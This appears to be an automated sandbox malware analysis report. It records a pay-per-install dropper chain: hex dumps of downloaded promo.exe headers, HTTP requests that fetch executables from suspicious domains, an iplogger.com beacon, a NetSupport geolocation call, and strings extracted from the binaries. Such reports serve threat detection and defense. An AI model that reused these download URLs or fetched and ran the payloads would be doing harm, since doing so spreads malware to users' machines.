00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 9e 05 00 00 40 0d 00 00 a0 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 12 00 00 76 00 00 00 94 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Wed, 06 Dec 2023 13:34:53 GMTContent-Type: application/octet-streamContent-Length: 2713088Connection: keep-aliveContent-Disposition: attachment; filename=promo.exeData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 da fa 65 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 94 06 00 00 8c 03 00 00 00 00 00 00 50 6a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 6a 00 00 04 00 00 f0 74 29 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 60 0a 00 95 00 00 00 00 30 08 00 6a 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 0a 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 08 00 00 10 00 00 00 6e 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6a 24 02 00 00 30 08 00 00 10 01 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 0a 00 00 02 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 3b 00 00 70 0a 00 00 02 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 65 62 65 79 74 7a 6b 00 e0 24 00 00 70 45 00 00 d2 24 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 7a 6e 70 66 74 62 00 10 00 00 00 50 6a 00 00 02 00 00 00 64 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Wed, 06 Dec 2023 13:35:39 GMTContent-Type: application/octet-streamContent-Length: 2590208Connection: keep-aliveContent-Disposition: attachment; filename=promo.exeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 d8 8f fd b9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 bc 04 00 00 38 03 00 00 00 00 00 00 c0 51 00 00 20 00 00 00 e0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 51 00 00 04 00 00 35 46 28 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 20 08 00 95 00 00 00 00 e0 04 00 56 35 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 04 00 00 20 00 00 00 d8 01 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 56 35 03 00 00 e0 04 00 00 f4 02 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 20 08 00 00 02 00 00 00 ec 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 26 00 00 40 08 00 00 02 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 77 64 61 69 6f 6e 6e 00 a0 22 00 00 20 2f 00 00 94 22 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6b 67 70 69 75 76 69 00 20 00 00 00 c0 51 00 00 02 00 00 00 84 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                                  Source: Joe Sandbox ViewIP Address: 104.21.32.100 104.21.32.100
                                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10002A20 InternetReadFile,_fwrite,4_2_10002A20
                                  Source: global trafficHTTP traffic detected: GET /ss.php?a=3890&cc=US&t=1701869569 HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: false.apparelsilver.xyzConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /win/Inalstal_98220.exe HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: www.agenment.cloudConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gsFLpk9WD8mr+vo&MD=y8Xsl23L HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598 HTTP/1.1Host: axsboe-campaign.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_PukjvzWvVsvIJFh4xJhtXA2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: allroadslimit.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /updates/v114.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: dl.likeasurfer.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /updates/v113.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: dl.likeasurfer.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gsFLpk9WD8mr+vo&MD=y8Xsl23L HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000006416C752B8 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
                                  Source: global trafficHTTP traffic detected: GET /1gWvm4 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: iplogger.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /1gYvm4 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: iplogger.comConnection: Keep-AliveCookie: 513648751722101843=3; clhf03028ja=102.165.48.83
                                  Source: global trafficHTTP traffic detected: GET /ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ==&sub=&ps=655ed8e14a15c HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: sparksteam.site
                                  Source: global trafficHTTP traffic detected: GET /pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581 HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: sidemark.xyz
                                  Source: global trafficHTTP traffic detected: GET /pill.php HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: sparksteam.site
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /track_inl2.php?tim=1701869569&poid=2598&p=1.25 HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: send.planewool.xyz
                                  Source: global trafficHTTP traffic detected: GET /ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=1701869569 HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: false.apparelsilver.xyz
                                  Source: global trafficHTTP traffic detected: GET /installer.exe HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: kapetownlink.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=1701869569 HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: false.apparelsilver.xyz
                                  Source: global trafficHTTP traffic detected: GET /load/1509/promo.exe HTTP/1.1Accept: */*User-Agent: InnoDownloadPlugin/1.5Host: ambadevgroup.infoConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /stats/3/0/0 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: mysoftwareusa.info
                                  Source: global trafficHTTP traffic detected: GET /stats/3/1/0 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: mysoftwareusa.info
                                  Source: global trafficHTTP traffic detected: GET /archives/5 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: mysoftwareusa.info
                                  Source: global trafficHTTP traffic detected: GET /archives/7 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.5Host: mysoftwareusa.info
                                  Source: v113.exe, 00000020.00000000.2555915607.00000000005A8000.00000002.00000001.01000000.00000022.sdmp, v113.exe, 00000020.00000002.2749711024.00000000005A8000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: NShlwapi.dllShell32.dllbinSoftware\JavaSoft\Java Development Kit\JavaHomeSoftware\JavaSoft\Java Runtime Environment\FlashWindowFlashWindowExKernel32.dllGetPackagePathhttp://www.yahoo.comhttp://www.google.comTESThttp://www.example.comtin9999.tmp.partattachmentHEAD "=charsetfilename123DLDutf-8POSTISO-8859-1utf-16AdvancedInstallerUS-ASCIILocal Network ServerGET*/*FTP ServerRange: bytes=%u- equals www.yahoo.com (Yahoo)
                                  Source: a1.exe, 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmp, a1.exe, 00000014.00000000.2293954187.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: \.FlashWindowExFlashWindowKernel32.dllGetPackagePathhttp://www.example.comTESThttp://www.google.comhttp://www.yahoo.comtin9999.tmpGETattachment.partfilenamecharset= "POSTutf-8DLD123US-ASCIIAdvancedInstallerutf-16ISO-8859-1*/*HTTP/1.0Local Network ServerFTP ServerContent-Type: application/x-www-form-urlencoded; charset=utf-8 equals www.yahoo.com (Yahoo)
                                  Source: unknownDNS traffic detected: queries for: sparksteam.site
                                  Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2483Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1701869563912&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: wmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: shi4D3B.tmp.33.drString found in binary or memory: http://.css
                                  Source: shi4D3B.tmp.33.drString found in binary or memory: http://.jpg
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: wmiprvse.exe, 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://231005002055611.bcn.lca62.shop/
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://231005002055611.bcn.lca62.shop/f/fvgbu1005611.exe
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://231005002055611.bcn.lca62.shop/f/fvgbu1005611.exeZ
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://231005002055611.bcn.lca62.shop/f/fvgbu1005611.exev
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                                  Source: a1.exe, 00000014.00000003.2318044040.00000000043E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
